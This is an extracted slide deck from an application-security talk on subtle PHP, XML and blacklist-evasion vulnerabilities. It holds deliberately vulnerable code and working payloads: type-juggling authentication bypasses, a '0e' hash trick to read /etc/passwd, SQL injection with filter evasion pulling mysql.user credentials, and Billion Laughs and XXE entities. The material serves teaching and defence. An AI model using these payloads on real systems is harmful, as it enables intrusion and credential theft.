Download - Php Vulns Slides
![Page 1: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/1.jpg)
Application security
Not so obvious vulnerabilities
Nicolas Grégoire / Agarri CERN
![Page 2: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/2.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 3: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/3.jpg)
$ Whoami
Nicolas Grégoire / Agarri Founder
13 years of Infosec experience
Half consultant, half end-user
Always with a "breaker" mentality
Doing Pentesting, Training, Research
![Page 4: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/4.jpg)
i
![Page 5: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/5.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 6: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/6.jpg)
The Target
<?php
$key = "llocdpocuzion5dcp2bindhspiccy";$flag = strcmp($key, $_GET['key']);
if ($flag == 0) {print "Welcome!";
} else {print "Bad key!";
}
?>
![Page 7: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/7.jpg)
strcmp()
Pasted from the PHP 5 documentation:
http://www.php.net/manual/en/function.strcmp.php
int strcmp ( string $str1 , string $str2 )
Note that this comparison is case sensitive.
Returns < 0 if str1 is less than str2; > 0 if str1 is greater than str2, and 0 if they are equal.
![Page 8: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/8.jpg)
The Idea
Parameters to a PHP script can be :
Strings
Arrays
The doc for strcmp() doesn't state what should happen if $_GET['key'] is an array
Let's try...
var_dump(strcmp( '', array() )) => NULL
![Page 9: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/9.jpg)
The Hack
The laxist operator "==" is used
"===" would have check both type and value
"==" will do some crazy conversions before comparing
![Page 10: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/10.jpg)
The Proof
![Page 11: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/11.jpg)
The Exploit
http://target/strcmp.php?key[]
![Page 12: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/12.jpg)
DEMO
![Page 13: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/13.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 14: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/14.jpg)
Typo3
Typo3 allows to access almost any file:
http://foobar/index.php?
jumpurl=target.txt & locationData=1::1 &JuSecure=1 &juHash=31337f0023
Here's a simplified version:
http://127.0.0.1/cern/typo3.php?
f=/etc/motd & h=3be1c7180e
![Page 15: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/15.jpg)
The Target<?php
$file = $_GET['f']; $hash = $_GET['h'];
$key = "SuperSecretPassword!";$target = substr(md5($key . $file), 0, 10);
if ($hash == $target) { print "Hash [$target]\n"; print "File [$file]\n";
readfile($file);}
?>
![Page 16: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/16.jpg)
The Crypto
MD5: 32 nibbles / 16 bytes
256^16 = 3.4 * 10^38
If truncated to 5 bytes
256^5 = 1.1 * 10^12
An attacker needs on average 550 billion tries
That seems quite secure
![Page 17: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/17.jpg)
But...
<?php
if ("100" == "0100") { … }if ("100" == "10e1") { … }if ("100" == "1e2") { … }if ("100" == "001e0002") { … }
?>
![Page 18: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/18.jpg)
The Hack
The string "0" will match:
00000000
0e01234567 0e76543210 000e000123 0000000e44
![Page 19: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/19.jpg)
The Maths
We need a hash like "0e[0-9]{8}"
P(First byte is "0E"): 1/256
P(Other Nibbles are "[0-9]"): (10/16)^8
P("0e[0-9]{8}") = 0,01%
An attacker needs on average 5000 tries
![Page 20: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/20.jpg)
The Exploit
Fixed hash
Value is "0"
Variable filename
Prefixed with "/"
http://127.0.0.1/cern/typo3.php?
f=//[...]//etc/passwd & h=0
![Page 21: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/21.jpg)
DEMO
![Page 22: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/22.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 23: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/23.jpg)
XML?
![Page 24: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/24.jpg)
Billion Laughs attack
<!DOCTYPE entry [ <!ENTITY lol0 "lol lol lol lol lol lol lol "> <!ENTITY lol1 "&lol0;&lol0;&lol0;&lol0;&lol0;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;">]>
<feed xmlns="http://www.w3.org/2005/Atom"><title>PoC for a LOL DoS</title><entry>
<title>&lol6;</title></entry>
</feed>
![Page 25: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/25.jpg)
DEMO
![Page 26: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/26.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 27: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/27.jpg)
XML eXternal Entities
<!DOCTYPE entry [ <!ENTITY foo SYSTEM "file://etc/passwd">]>
<feed xmlns="http://www.w3.org/2005/Atom"><title>PoC for a XXE attack</title><entry>
<title>&foo;</title></entry>
</feed>
![Page 28: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/28.jpg)
URL Handlers
file:// //srv/
http:// https://
ftp:// tftp://
Gopher:// ldap://
Php:// ssh2.sftp://
And more...
![Page 29: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/29.jpg)
Risks
Read local files
Steal NTLM hashes
Access services restricted by IP address
Access others machines (hop though a fw)
Brute-force credentials via SFTP
Craft text-oriented packets using gopher://
And more...
![Page 30: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/30.jpg)
DEMO
![Page 31: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/31.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 32: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/32.jpg)
XML Entities
XML document:<!DOCTYPE doc [ <!ENTITY foobar SYSTEM "/etc/passwd">]>
PHP code:if (strpros($file_content, '<!ENTITY') !== FALSE) {
print 'Attack detected';exit;
}
![Page 33: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/33.jpg)
strpos()
Pasted from the PHP 5 documentation:
http://www.php.net/manual/en/function.strpos.php
int strpos ( string $haystack , mixed $needle )
Returns the position of where the needle exists relative to the beginning of the haystack string. Also note that string positions start at 0, and not 1. Returns FALSE if the needle was not found.
![Page 34: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/34.jpg)
The analysis
The PHP strict operator "!==" is used
No way to confuse NULL and 0
Would not be a valid document anyway
The detected string is defined as a litteral
No way to play with case or spacing
So, is it secure?
![Page 35: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/35.jpg)
The Idea
strpos() works only on ASCII strings
Not the underlying XML parser
Let's encode our XML document
![Page 36: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/36.jpg)
The Hack
UTF-7 and UTF-8 are not interesting
'A': 0x41
UTF-16 seems OK
'A': 0x00 0x41
$ iconv --from-code=ascii
--to-code=utf-16 < a.xml > b.xml
![Page 37: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/37.jpg)
DEMO
![Page 38: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/38.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 39: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/39.jpg)
Trivial Cleaning
<?php
$category = str_replace("'", "\'", $category);
$sql = "select TITLE, CONTENT, CATEGORY from postings where CATEGORY = '$category'";
$result = mysql_query($sql)or die("Invalid request: ".mysql_error());
?>
![Page 40: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/40.jpg)
The Idea
\ is used to escape '
But \ itsef isn't escaped
![Page 41: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/41.jpg)
The Hack
If an attacker provides \'
The application sees \\'
![Page 42: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/42.jpg)
The Exploit
/sqli.php?x\' or 1=1 -- x
/sqli.php?x\' UNION
SELECT user, password
FROM mysql.user
WHERE user="root" -- x
![Page 43: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/43.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 44: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/44.jpg)
Complex Blacklist
Forbidden items :
String "SELECT" (lc/uc)
String "UNION" (lc/uc)
String "mysql.user" (lc)
String "root" (lc)
Comments like " -- " and "/* */"
Spaces
![Page 45: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/45.jpg)
Complex Bypass
Strings "SELECT" and "UNION" (lc/uc)
Mixed case
String "mysql.user" (lc)
Backtick around names
String "root" (lc)
Hex: 0x726F6F74
Comments like " -- " and "/* */"
Use #
Spaces
0x09 (Tab) or 0x0B (Vertical Tab) or ...
![Page 46: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/46.jpg)
The Exploit
/sqli.php?x\'%0AUnioN
%0BSeLeCt%0Cuser,password
%0AFROM%0B`mysql`.`user`
%0CWHERE%0Auser=0x726F6F74#
![Page 47: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/47.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 48: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/48.jpg)
XSLT?
Functional programming Language
Used to manipulate XML documents
Turing-Complete
Available in:
Browsers, databases, web Applications
Digital signatures, image viewers, ...
![Page 49: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/49.jpg)
Dumb Fuzzing
Take some valid files
Mutate these files
Feed the new files to the engine
Monitor CPU, RAM, processes, …
Analyze crashes
![Page 50: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/50.jpg)
Setup
![Page 51: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/51.jpg)
Results
Plenty of (security related) bugs!
MSXML: CVE-2013-0007
Libxslt: CVE-2102-2871, CVE-2102-2825, …
Adobe Reader: CVE-2012-1525, CVE-2012-1530
Firefox: CVE-2012-3972, CVE-2102-0449
And more : Intel, Oracle, ...
![Page 52: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/52.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 53: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/53.jpg)
Abuse of features
Very large set of features
Standardized versions
XSLT 1.0, XSLT 1.1, XSLT, 2.0, XSLT 3.0
Community effort
EXSLT
Proprietary extensions
In nearly every engine
![Page 54: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/54.jpg)
Standard features
![Page 55: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/55.jpg)
Proprietary features
![Page 56: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/56.jpg)
DEMO
![Page 57: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/57.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 58: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/58.jpg)
Conclusion
Attacker:
Subtle bugs are hard
Subtle bugs are fun
Defender:
In order to build something secure, you need to investigate / understand each underlying technology!
Reducing complexity is the key
![Page 59: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/59.jpg)
The End
Questions?
Contact:
Nicolas.gregoire (at) agarri.fr Agarri_FR on Twitter
![Page 60: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/60.jpg)
References
http://www.php.net/manual/en/types.comparisons.php
http://www.php.net/manual/en/function.strcmp.php
http://www.php.net/manual/en/function.strpos.php
http://gregorkopf.de/slides_berlinsides_2010.pdf
http:// erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf
http://webstersprodigy.net/2012/11/09/csaw-2012-quals-tutorialwriteup/
http://code.google.com/p/ouspg/wiki/Radamsa
http://www.metasploit.com/